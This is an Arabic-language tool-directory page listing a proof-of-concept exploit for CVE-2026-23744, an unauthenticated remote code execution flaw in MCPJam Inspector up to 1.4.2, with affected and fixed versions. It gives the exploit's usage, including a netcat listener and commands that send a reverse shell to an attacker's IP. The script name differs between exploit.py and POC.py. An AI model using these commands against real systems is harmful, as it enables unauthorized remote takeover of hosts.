Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — إثبات مفهوم استغلال لثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في MCPJam Inspector <= 1.4.2. | Kitploit
أدوات/GitHubGitHub/0xsoulaimane/cve-2026-23744-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHub0xsoulaimane/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — إثبات مفهوم استغلال لثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في MCPJam Inspector <= 1.4.2.

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — تنفيذ أوامر عن بُعد (RCE) بدون مصادقة في MCPJam Inspector

Python CVE Platform

يقوم MCPJam Inspector <= 1.4.2 بالارتباط بـ 0.0.0.0 افتراضيًا ويكشف عن /api/mcp/connect دون أي مصادقة. تقبل نقطة النهاية كائن serverConfig يقوم بتشغيل عملية مباشرة على المضيف — تمرير حمولة reverse shell يمنح تنفيذ أوامر عن بُعد (RCE) فوري دون الحاجة إلى أي بيانات اعتماد.


المتطلبات

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
العلمالوصفالافتراضي
-uعنوان URL الهدفمطلوب
-iعنوان IP الخاص بالمستمع (LHOST)مطلوب
-pمنفذ المستمع (LPORT)مطلوب
-mطريقة الحمولة: busybox، bash، python3busybox

مثال على Reverse Shell

الخطوة 1 — ابدأ المستمع:

root@kitploit:~
nc -lvnp 4444

الخطوة 2 — شغّل الاستغلال:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

طرق الحمولة

إذا لم تعمل busybox على الهدف، جرّب الطرق الأخرى:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

الإصدارات المتأثرة

البرنامجعرضة للثغرةمُصلَح
MCPJam Inspector<= 1.4.21.4.3

المراجع

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
تنزيل الأداة